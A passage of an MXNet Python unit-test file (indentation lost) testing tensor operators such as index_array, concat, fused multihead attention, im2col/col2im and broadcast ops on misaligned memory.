for axes in [(3,), (4, 1), (5, 1, 3), (-1,), (-5, -1, -3)]:
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data, axes=axes)
input_array = np.ones(shape)
mgrid = np.mgrid[tuple(slice(0, x) for x in shape)]
expected = np.stack(mgrid, axis=-1)[..., axes]
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
@mx.use_np_shape
def test_index_array_select_axes_zero_size():
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data, axes=(2, 1))
input_array = np.ones((0, 0, 0, 0))
expected = np.zeros((0, 0, 2))
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
test_index_array_default()
test_index_array_default_zero_dim()
test_index_array_default_zero_size()
test_index_array_select_axes()
test_index_array_select_axes_zero_size()
def test_scalar_tensor_creation():
assertRaises(MXNetError, mx.nd.zeros, shape=())
assertRaises(MXNetError, mx.nd.ones, shape=())
with mx.np_shape():
data_mx = mx.nd.ones(shape=())
data_np = np.ones((), dtype=data_mx.dtype)
assert same(data_mx.asnumpy(), data_np)
def test_zero_size_tensor_creation():
assertRaises(MXNetError, mx.nd.zeros, shape=(0, 1, 3, 0))
assertRaises(MXNetError, mx.nd.ones, shape=(0, 1, 3, 0))
with mx.np_shape():
data_mx = mx.nd.ones(shape=(0, 1, 0, 4))
data_np = np.ones(shape=data_mx.shape, dtype=data_mx.dtype)
assert same(data_mx.asnumpy(), data_np)
def test_concat_with_zero_size_tensor():
with mx.np_shape():
data1 = mx.nd.ones((0, 8, 12))
data2 = mx.nd.ones((3, 8, 12))
data3 = mx.nd.ones((0, 8, 12))
ret = mx.nd.Concat(data1, data2, data3, dim=0)
assert ret.shape == (3, 8, 12)
data1 = mx.nd.ones((0, 3, 10))
data2 = mx.nd.ones((0, 4, 10))
data3 = mx.nd.ones((0, 5, 10))
ret = mx.nd.Concat(data1, data2, data3, dim=1)
assert ret.shape == (0, 12, 10)
def test_np_shape_decorator():
@mx.use_np_shape
def check_scalar_one():
"""Generate scalar one tensor"""
return mx.nd.ones(shape=())
assert check_scalar_one.__name__ == "check_scalar_one"
assert check_scalar_one.__doc__ == "Generate scalar one tensor"
assert check_scalar_one().shape == ()
for active in [True, False]:
with mx.np_shape(active=active):
assert check_scalar_one.__name__ == "check_scalar_one"
assert check_scalar_one.__doc__ == "Generate scalar one tensor"
assert check_scalar_one().shape == ()
@mx.use_np_shape
def check_concat(shape1, shape2, axis):
data1 = mx.nd.ones(shape1)
data2 = mx.nd.ones(shape2)
ret = mx.nd.Concat(data1, data2, dim=axis)
expected_ret = np.concatenate((data1.asnumpy(), data2.asnumpy()), axis=axis)
assert ret.shape == expected_ret.shape
check_concat((0, 3, 4), (5, 3, 4), 0)
check_concat((8, 0, 5), (8, 7, 5), 1)
check_concat((8, 0, 0), (8, 0, 0), 2)
for active in [True, False]:
check_concat((0, 3, 4), (5, 3, 4), 0)
check_concat((8, 0, 5), (8, 7, 5), 1)
check_concat((8, 0, 0), (8, 0, 0), 2)
def test_add_n():
data_shape = (2, 2)
input_num = 5
data = [mx.nd.random.uniform(shape=data_shape) for i in range(input_num)]
rslt = mx.nd.zeros(shape=data_shape)
for i in range(input_num):
rslt += data[i]
add_n_rslt = mx.nd.add_n(*data, out=data[0])
assert_almost_equal(rslt.asnumpy(), add_n_rslt.asnumpy(), atol=1e-5)
def test_get_all_registered_operators():
ops = get_all_registered_operators()
assert isinstance(ops, list)
assert len(ops) > 0
assert 'Activation' in ops
def test_get_operator_arguments():
operator_arguments = get_operator_arguments('Activation')
assert isinstance(operator_arguments, OperatorArguments)
assert operator_arguments.names == ['data', 'act_type']
assert operator_arguments.types \
== ['NDArray-or-Symbol', "{'relu', 'sigmoid', 'softrelu', 'softsign', 'tanh'}, required"]
assert operator_arguments.narg == 2
def test_transpose_infer_shape_back():
o1 = mx.sym.ones(shape=[2,3])
o2 = mx.sym.ones(shape=[-1,-1])
t = mx.sym.transpose(o2)
b = o1 + t
x = b._bind(mx.cpu(), args={})
y = x.forward()
assert(y[0].shape == (2,3))
def test_transpose_infer_shape_mixed():
o1 = mx.sym.ones(shape=[2,-1])
o2 = mx.sym.ones(shape=[3,-1])
t = mx.sym.transpose(o2)
b = o1 + t
x = b._bind(mx.cpu(), args={})
y = x.forward()
assert(y[0].shape == (2,3))
def test_sample_normal_default_shape():
# Test case from https://github.com/apache/incubator-mxnet/issues/16135
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]))
assert s.shape == (1,)
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]), shape=())
assert s.shape == (1,)
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]), shape=1)
assert s.shape == (1, 1)
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]), shape=(1,))
assert s.shape == (1, 1)
def test_large_tensor_disabled_err_msg():
LARGE_X = 4300000000
MEDIUM_X = 1000000000
SMALL_Y = 1
shape = (2, LARGE_X)
def check_nd_array():
x = np.arange(0, LARGE_X)
assertRaises(MXNetError, mx.nd.array, x)
def check_nd_ones():
assertRaises(MXNetError, mx.nd.ones, shape)
def check_nd_zeros():
assertRaises(MXNetError, mx.nd.zeros, shape)
def check_nd_full():
val = 1
assertRaises(Exception, mx.nd.full, shape, val)
def check_nd_arange():
start = 0
stop = LARGE_X
assertRaises(Exception, mx.nd.arange, start, stop)
def check_nd_random():
shape = (2, LARGE_X)
def check_random_exp():
lam = 4
assertRaises(MXNetError, mx.nd.random_exponential, lam, shape)
def check_random_gamma():
alpha = 9
beta = 0.5
assertRaises(MXNetError, mx.nd.random_gamma, alpha, beta, shape)
def check_random_normal():
loc = 0
scale = 1
assertRaises(MXNetError, mx.nd.random_normal, loc, scale, shape)
def check_random_poisson():
lam = 4
assertRaises(MXNetError, mx.nd.random_poisson, lam, shape)
def check_random_randint():
low = 0
high = 1000000
assertRaises(MXNetError, mx.nd.random_randint, low, high, shape)
def check_random_uniform():
low = 0
high = 1
assertRaises(MXNetError, mx.nd.random_uniform, low, high, shape)
def check_multihead_attention_selfatt(dtype):
def convert_weight(F, q_weight, k_weight, v_weight, num_heads):
q_weight = F.reshape(q_weight, shape=(num_heads, -1, 0), reverse=True)
k_weight = F.reshape(k_weight, shape=(num_heads, -1, 0), reverse=True)
v_weight = F.reshape(v_weight, shape=(num_heads, -1, 0), reverse=True)
all_weights = F.concat(q_weight, k_weight, v_weight, dim=-2)
all_weights = F.reshape(all_weights, shape=(-1, 0), reverse=True)
return all_weights
def convert_bias(F, q_bias, k_bias, v_bias, num_heads):
q_bias = F.reshape(q_bias, shape=(num_heads, -1))
k_bias = F.reshape(k_bias, shape=(num_heads, -1))
v_bias = F.reshape(v_bias, shape=(num_heads, -1))
all_bias = F.stack(q_bias, k_bias, v_bias, axis=1)
all_bias = F.reshape(all_bias, shape=(-1,))
return all_bias
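# convert_weight/convert_bias pack the separate q/k/v projections into the interleaved
# per-head layout [head0_q, head0_k, head0_v, head1_q, ...] so that the fused qkv
# projection below matches what the interleaved_matmul_selfatt_* operators consume.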
batch_size = 2
qkv_length = 7 # length of a sequence
qkv_dim = 9 # dimension of encoding
num_heads = 3 # number of attention heads
head_dim = 5 # head size
out_dim = 13 * num_heads
qkv_units = num_heads * head_dim
arg_params = {
'qkv': mx.nd.array(np.random.rand(*(batch_size, qkv_length, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'k_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'v_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'k_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'v_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'out_weight': mx.nd.array(np.random.rand(*(out_dim, qkv_units)).astype(dtype) * 0.1, dtype=dtype),
'out_bias': mx.nd.array(np.random.rand(*(out_dim,)).astype(dtype) * 0.1, dtype=dtype),
}
qkv = mx.sym.Variable('qkv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
qkv_weight = convert_weight(mx.sym, q_weight, k_weight, v_weight, num_heads)
qkv_bias = convert_bias(mx.sym, q_bias, k_bias, v_bias, num_heads)
qkv = mx.sym.transpose(qkv, axes=(1, 0, 2))
qkv_proj = mx.sym.FullyConnected(qkv, weight=qkv_weight, bias=qkv_bias, flatten=False,
num_hidden=qkv_units * 3, no_bias=False)
att_score = mx.sym.contrib.interleaved_matmul_selfatt_qk(
qkv_proj, heads=num_heads)
att_score = att_score + sonde
weighted_value = mx.sym.contrib.interleaved_matmul_selfatt_valatt(
qkv_proj, att_score, heads=num_heads)
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.transpose(output, axes=(1, 0, 2))
output = mx.sym.Group([output, att_score])
executor = output._simple_bind(ctx=default_context(),
qkv=(batch_size, qkv_length, qkv_dim),
q_weight=(qkv_units, qkv_dim),
q_bias=(qkv_units,),
k_weight=(qkv_units, qkv_dim),
k_bias=(qkv_units,),
v_weight=(qkv_units, qkv_dim),
v_bias=(qkv_units,),
type_dict={'qkv': dtype,
'q_weight': dtype,
'k_weight': dtype,
'v_weight': dtype,
'q_bias': dtype,
'k_bias': dtype,
'v_bias': dtype,
'sonde': dtype},
grad_req='write')
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_shape = executor.outputs[0].shape
output_grads = np.random.rand(*output_shape).astype(dtype) * 0.1
output_opti = executor.outputs[0].asnumpy()
att_score_opti = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype),
mx.nd.zeros(att_score_opti.shape, dtype=dtype)])
grads_opti = {k: v.asnumpy() for k, v in executor.grad_dict.items()}
qkv = mx.sym.Variable('qkv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
q = mx.sym.FullyConnected(qkv, weight=q_weight, bias=q_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
k = mx.sym.FullyConnected(qkv, weight=k_weight, bias=k_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
v = mx.sym.FullyConnected(qkv, weight=v_weight, bias=v_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
q = mx.sym.reshape(q, shape=(0, 0, num_heads, -1))
q = mx.sym.transpose(q, axes=(0, 2, 1, 3))
q = mx.sym.reshape(q, shape=(-1, 0, 0), reverse=True)
k = mx.sym.reshape(k, shape=(0, 0, num_heads, -1))
k = mx.sym.transpose(k, axes=(0, 2, 1, 3))
k = mx.sym.reshape(k, shape=(-1, 0, 0), reverse=True)
q = mx.sym.contrib.div_sqrt_dim(q)
att_score = mx.sym.batch_dot(q, k, transpose_b=True)
att_score = att_score + sonde
v = mx.sym.reshape(v, shape=(0, 0, num_heads, -1))
v = mx.sym.transpose(v, axes=(0, 2, 1, 3))
v = mx.sym.reshape(v, shape=(-1, 0, 0), reverse=True)
weighted_value = mx.sym.batch_dot(att_score, v)
weighted_value = mx.sym.reshape(weighted_value, shape=(-1, num_heads, 0, 0),
reverse=True)
weighted_value = mx.sym.transpose(weighted_value, axes=(0, 2, 1, 3))
weighted_value = mx.sym.reshape(weighted_value, shape=(0, 0, -1))
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.Group([output, att_score])
executor = output._simple_bind(ctx=default_context(),
qkv=(batch_size, qkv_length, qkv_dim),
type_dict={'qkv': dtype},
grad_req='write')
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_orig = executor.outputs[0].asnumpy()
att_score_orig = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype),
mx.nd.zeros(att_score_orig.shape, dtype=dtype)])
grads_orig = {k : v.asnumpy() for k, v in executor.grad_dict.items()}
assert_allclose(att_score_orig, att_score_opti, rtol=1e-2, atol=1e-3)
assert_allclose(output_orig, output_opti, rtol=1e-2, atol=1e-3)
for k in grads_opti.keys():
assert(grads_orig[k].dtype == grads_opti[k].dtype)
assert(grads_orig[k].shape == grads_opti[k].shape)
assert_allclose(grads_orig[k], grads_opti[k], rtol=1e-2, atol=1e-3)
@assert_raises_cuda_not_satisfied(min_version='9.1')
@pytest.mark.serial
def test_multihead_attention_selfatt():
dtypes = ['float32']
if default_context().device_type == 'gpu':
dtypes += ['float16']
for dtype in dtypes:
check_multihead_attention_selfatt(dtype=dtype)
def check_multihead_attention_encdec(dtype):
def convert_weight(F, k_weight, v_weight, num_heads):
k_weight = F.reshape(k_weight, shape=(num_heads, -1, 0), reverse=True)
v_weight = F.reshape(v_weight, shape=(num_heads, -1, 0), reverse=True)
all_weights = F.concat(k_weight, v_weight, dim=-2)
all_weights = F.reshape(all_weights, shape=(-1, 0), reverse=True)
return all_weights
def convert_bias(F, k_bias, v_bias, num_heads):
k_bias = F.reshape(k_bias, shape=(num_heads, -1))
v_bias = F.reshape(v_bias, shape=(num_heads, -1))
all_bias = F.stack(k_bias, v_bias, axis=1)
all_bias = F.reshape(all_bias, shape=(-1,))
return all_bias
batch_size = 2
qkv_length = 7 # length of a sequence
qkv_dim = 9 # dimension of encoding
num_heads = 3 # number of attention heads
head_dim = 5 # head size
out_dim = 13 * num_heads
qkv_units = num_heads * head_dim
arg_params = {
'q': mx.nd.array(np.random.rand(*(batch_size, qkv_length, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'kv': mx.nd.array(np.random.rand(*(batch_size, qkv_length, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'k_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'v_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'k_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'v_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'out_weight': mx.nd.array(np.random.rand(*(out_dim, qkv_units)).astype(dtype) * 0.1, dtype=dtype),
'out_bias': mx.nd.array(np.random.rand(*(out_dim,)).astype(dtype) * 0.1, dtype=dtype),
}
q = mx.sym.Variable('q')
kv = mx.sym.Variable('kv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
kv_weight = convert_weight(mx.sym, k_weight, v_weight, num_heads)
kv_bias = convert_bias(mx.sym, k_bias, v_bias, num_heads)
kv = mx.sym.transpose(kv, axes=(1, 0, 2))
kv_proj = mx.sym.FullyConnected(kv, weight=kv_weight, bias=kv_bias, flatten=False,
num_hidden=qkv_units * 2, no_bias=False)
q = mx.sym.transpose(q, axes=(1, 0, 2))
q_proj = mx.sym.FullyConnected(q, weight=q_weight, bias=q_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
att_score = mx.sym.contrib.interleaved_matmul_encdec_qk(
q_proj, kv_proj, heads=num_heads)
att_score = att_score + sonde
weighted_value = mx.sym.contrib.interleaved_matmul_encdec_valatt(
kv_proj, att_score, heads=num_heads)
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.transpose(output, axes=(1, 0, 2))
output = mx.sym.Group([output, att_score])
executor = output._simple_bind(ctx=default_context(),
q=(batch_size, qkv_length, qkv_dim),
kv=(batch_size, qkv_length, qkv_dim),
q_weight=(qkv_units, qkv_dim),
q_bias=(qkv_units,),
k_weight=(qkv_units, qkv_dim),
k_bias=(qkv_units,),
v_weight=(qkv_units, qkv_dim),
v_bias=(qkv_units,),
out_weight=(out_dim, qkv_units),
out_bias=(out_dim,),
type_dict={'q': dtype,
'kv': dtype,
'q_weight': dtype,
'q_bias': dtype,
'k_weight': dtype,
'k_bias': dtype,
'v_weight': dtype,
'v_bias': dtype,
'out_weight': dtype,
'out_bias': dtype,
},
grad_req='write')
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_shape = executor.outputs[0].shape
output_grads = np.random.rand(*output_shape).astype(dtype) * 0.1
output_opti = executor.outputs[0].asnumpy()
att_score_opti = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype), mx.nd.zeros(att_score_opti.shape, dtype=dtype)])
grads_opti = {k: v.asnumpy() for k, v in executor.grad_dict.items()}
q = mx.sym.Variable('q')
kv = mx.sym.Variable('kv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
q = mx.sym.FullyConnected(q, weight=q_weight, bias=q_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
k = mx.sym.FullyConnected(kv, weight=k_weight, bias=k_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
v = mx.sym.FullyConnected(kv, weight=v_weight, bias=v_bias, flatten=False,
num_hidden=qkv_units, no_bias=False)
q = mx.sym.reshape(q, shape=(0, 0, num_heads, -1))
q = mx.sym.transpose(q, axes=(0, 2, 1, 3))
q = mx.sym.reshape(q, shape=(-1, 0, 0), reverse=True)
k = mx.sym.reshape(k, shape=(0, 0, num_heads, -1))
k = mx.sym.transpose(k, axes=(0, 2, 1, 3))
k = mx.sym.reshape(k, shape=(-1, 0, 0), reverse=True)
q = mx.sym.contrib.div_sqrt_dim(q)
att_score = mx.sym.batch_dot(q, k, transpose_b=True)
att_score = att_score + sonde
v = mx.sym.reshape(v, shape=(0, 0, num_heads, -1))
v = mx.sym.transpose(v, axes=(0, 2, 1, 3))
v = mx.sym.reshape(v, shape=(-1, 0, 0), reverse=True)
weighted_value = mx.sym.batch_dot(att_score, v)
weighted_value = mx.sym.reshape(weighted_value, shape=(-1, num_heads, 0, 0),
reverse=True)
weighted_value = mx.sym.transpose(weighted_value, axes=(0, 2, 1, 3))
weighted_value = mx.sym.reshape(weighted_value, shape=(0, 0, -1))
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
output = mx.sym.Group([output, att_score])
executor = output._simple_bind(ctx=default_context(),
q=(batch_size, qkv_length, qkv_dim),
kv=(batch_size, qkv_length, qkv_dim),
type_dict={'q': dtype,
'kv': dtype},
grad_req='write')
executor.copy_params_from(arg_params, {})
executor.arg_dict['sonde'][:] = 0.
executor.arg_dict['sonde'].wait_to_read()
executor.forward(is_train=True)
output_orig = executor.outputs[0].asnumpy()
att_score_orig = executor.outputs[1].asnumpy()
executor.backward([mx.nd.array(output_grads, dtype=dtype), mx.nd.zeros(att_score_orig.shape, dtype=dtype)])
grads_orig = {k : v.asnumpy() for k, v in executor.grad_dict.items()}
assert_allclose(att_score_orig, att_score_opti, rtol=1e-2, atol=1e-3)
assert_allclose(output_orig, output_opti, rtol=1e-2, atol=1e-3)
for k in grads_opti.keys():
assert(grads_orig[k].dtype == grads_opti[k].dtype)
assert(grads_orig[k].shape == grads_opti[k].shape)
assert_allclose(grads_orig[k], grads_opti[k], rtol=1e-2, atol=1e-3)
@assert_raises_cuda_not_satisfied(min_version='9.1')
@pytest.mark.serial
def test_multihead_attention_encdec():
dtypes = ['float32']
if default_context().device_type == 'gpu':
dtypes += ['float16']
for dtype in dtypes:
check_multihead_attention_encdec(dtype=dtype)
@pytest.mark.serial
def test_im2col_col2im():
def compute_output_size(spatial, kernel, stride=1, dilate=1, pad=0):
pad_size = spatial + 2 * pad
dilated_kernel = dilate * (kernel - 1) + 1
return (pad_size - dilated_kernel) // stride + 1
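# Standard convolution output-size formula; e.g. spatial=30, kernel=3,
# stride=2, dilate=2, pad=1 gives (30 + 2*1 - (2*(3-1) + 1)) // 2 + 1 = 14.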
def build_kwargs(kernel, stride=1, dilate=1, pad=0):
return {'kernel': (kernel, kernel),
'stride': (stride, stride),
'dilate': (dilate, dilate),
'pad': (pad, pad)}
# use im2col to compute convolution
def test_conv_compute(input_shape, num_filter, kernel, stride=1, dilate=1, pad=0):
batch_size = input_shape[0]
channel = input_shape[1]
kwargs = build_kwargs(kernel, stride, dilate, pad)
data = mx.nd.uniform(shape=input_shape)
col = mx.nd.im2col(data, **kwargs)
w = mx.nd.uniform(shape=(num_filter, channel, kernel, kernel))
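# im2col unrolls every receptive field into a column, so col has shape
# (N, C*k*k, H_out*W_out); multiplying by the filters reshaped to
# (num_filter, C*k*k) turns the convolution into an ordinary matrix product,
# which the next line then transposes back to (N, num_filter, H_out*W_out).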
c1 = mx.nd.dot(col.transpose((0, 2, 1)), w.reshape(num_filter, -1).T).transpose((0, 2, 1))
hos = compute_output_size(input_shape[2], kernel, stride, dilate, pad)
wos = compute_output_size(input_shape[3], kernel, stride, dilate, pad)
c1 = c1.reshape((batch_size, num_filter, hos, wos))
c2 = mx.nd.Convolution(data, num_filter=num_filter, weight=w, no_bias=True, **kwargs)
assert_almost_equal(c1.asnumpy(), c2.asnumpy(), rtol=1e-5, atol=1e-5)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3
)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3,
stride = 2
)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3,
stride = 2,
dilate = 2
)
test_conv_compute(
input_shape = (5, 3, 30, 20),
num_filter = 10,
kernel = 3,
stride = 2,
dilate = 2,
pad = 1
)
# use composite of im2col and col2im to reconstruct image
def test_reconstruct(input_shape, kernel, stride=1, dilate=1, pad=0):
batch_size = input_shape[0]
channel = input_shape[1]
kwargs = build_kwargs(kernel, stride, dilate, pad)
data = mx.nd.uniform(shape=input_shape)
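# col2im sums overlapping patches back into the image, so col2im(im2col(x))
# equals x scaled element-wise by how many patches cover each pixel, which is
# exactly col2im(ones_like(col)); the two expressions below should match.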
col = mx.nd.im2col(data, **kwargs)
im1 = mx.nd.col2im(col, input_shape[2:], **kwargs)
im2 = mx.nd.col2im(mx.nd.ones_like(col), input_shape[2:], **kwargs) * data
assert_almost_equal(im1.asnumpy(), im2.asnumpy(), rtol=1e-5, atol=1e-5)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3
)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2
)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2
)
test_reconstruct(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2,
pad = 1
)
# test gradient
# the grad of im2col is col2im, and vice versa
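# im2col is a linear operator and col2im is its adjoint (it scatter-adds
# columns back to pixels), so backprop through either op is an application of
# the other; check_symbolic_backward verifies exactly that below.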
def test_grad(input_shape, kernel, stride=1, dilate=1, pad=0):
# im2col
data = mx.sym.Variable('data')
kwargs = build_kwargs(kernel, stride, dilate, pad)
sym = mx.sym.im2col(data, **kwargs)
im = mx.nd.uniform(shape=input_shape)
col = mx.nd.im2col(im, **kwargs)
col_shape = col.shape
expected = mx.nd.col2im(col, input_shape[2:], **kwargs)
check_symbolic_backward(sym, [im.asnumpy()], [col.asnumpy()], [expected.asnumpy()])
# col2im
data = mx.sym.Variable('data')
sym = mx.sym.col2im(data, input_shape[2:], **kwargs)
col = mx.nd.uniform(shape=col_shape)
im = mx.nd.col2im(col, input_shape[2:], **kwargs)
expected = mx.nd.im2col(im, **kwargs)
check_symbolic_backward(sym, [col.asnumpy()], [im.asnumpy()], [expected.asnumpy()])
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3
)
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2
)
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2
)
test_grad(
input_shape = (5, 3, 30, 20),
kernel = 3,
stride = 2,
dilate = 2,
pad = 1
)
def test_elemwise_sum_for_gradient_accumulation():
for nrepeat in range(1, 10):
stored_grad = dict()
for grad_req in ['write', 'add']:
a = mx.nd.array([1])
b = mx.nd.array([2])
if grad_req == 'write':
a.attach_grad(grad_req='write')
elif grad_req == 'add':
a.attach_grad(grad_req='add')
a.grad[:] = 0
with mx.autograd.record():
for _ in range(nrepeat):
b = b * a
b.backward()
stored_grad[grad_req] = a.grad.asscalar()
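# With a = 1 and b0 = 2, repeating b = b * a gives b_n = 2 * a**n, so
# db_n/da = 2 * n at a = 1; the 'write' and 'add' grad_req modes must
# both arrive at that same value, checked below.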
assert stored_grad['write'] == stored_grad['add']
assert stored_grad['write'] == 2 * nrepeat
def test_elementwise_ops_on_misaligned_input():
a = mx.nd.array([1,2,3,4], dtype='float16')
b = mx.nd.array([1,2,3,4], dtype='float16')
c = a[1:3]
d = b[1:3]
# Note: testing just elemwise_add since all elemwise_ops
# share the implementation
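# Slicing off leading elements gives NDArray views whose data pointers are
# offset by one or two float16 elements, which (presumably) forces the
# vectorized elementwise kernels down their unaligned-access code path.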
mx.nd.elemwise_add(c, d, out=c)
mx.nd.waitall()
a = mx.nd.array([1,2,3,4], dtype='float16')
b = mx.nd.array([1,2,3,4], dtype='float16')
c = a[0:3]
d = b[0:3]
mx.nd.elemwise_add(c, d, out=c)
mx.nd.waitall()
assert a[3].asscalar() == 4.0
@pytest.mark.parametrize('dtype', ['float16', 'float32', 'float64'])
@pytest.mark.parametrize('lead_dim', [2, 3, 4, 6, 10])
@pytest.mark.parametrize('both_ways', [False, True])
def test_broadcast_ops_on_misaligned_input(dtype, lead_dim, both_ways):
shape = list(rand_shape_2d()) + [lead_dim]
small_shape = [shape[0], 1, lead_dim]
if both_ways:
# Broadcast in both ways [1, K, L] x [M, 1, L]
big_shape = [1, shape[1], lead_dim]
else:
big_shape = shape
size = np.product(shape)
small_size = np.product(small_shape)
big_size = np.product(big_shape)
a = mx.nd.arange(5000, dtype=dtype)
b = mx.nd.arange(5000, dtype=dtype)
e = mx.nd.arange(5000, dtype=dtype)
c = a[1:big_size + 1].reshape(big_shape)
d = b[1:small_size + 1].reshape(small_shape)
f = e[1:size + 1].reshape(shape)
mx.nd.broadcast_add(c, d, out=f)
expected = c.asnumpy() + d.asnumpy()
mx.nd.waitall()
assert_almost_equal(f, expected)
@pytest.mark.parametrize('dtype', ['float16', 'float32', 'float64'])
@pytest.mark.parametrize('lead_dim', [2, 3, 4, 6, 10])
@pytest.mark.parametrize('both_ways', [False, True])
def test_broadcast_ops_on_misaligned_input_oneside(dtype, lead_dim, both_ways):
shape = list(rand_shape_2d()) + [lead_dim]
small_shape = [shape[0], shape[1], 1]
if both_ways:
# Broadcast in both ways [1, K, L] x [M, 1, 1]
big_shape = [1, shape[1], lead_dim]
else:
big_shape = shape
size = np.product(shape)
small_size = np.product(small_shape)
big_size = np.product(big_shape)
a = mx.nd.arange(5000, dtype=dtype)
b = mx.nd.arange(5000, dtype=dtype)
e = mx.nd.arange(5000, dtype=dtype)
c = a[1:big_size + 1].reshape(big_shape)
d = b[1:small_size + 1].reshape(small_shape)
f = e[1:size + 1].reshape(shape)
mx.nd.broadcast_add(c, d, out=f)
expected = c.asnumpy() + d.asnumpy()
mx.nd.waitall()
assert_almost_equal(f, expected)
def test_sldwin_selfatten_operators():
def gen_sliding_window_mask_full(batch_size, num_heads, seq_length, w, symmetric, d):
mask_np = np.zeros((batch_size, num_heads, seq_length, seq_length))
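# Row i may attend to positions i - w*d .. i + w*d (only up to i when not
# symmetric), stepping by the dilation d. For example, seq_length=5, w=1,
# d=1, symmetric=True yields the tridiagonal band
#   1 1 0 0 0
#   1 1 1 0 0
#   0 1 1 1 0
#   0 0 1 1 1
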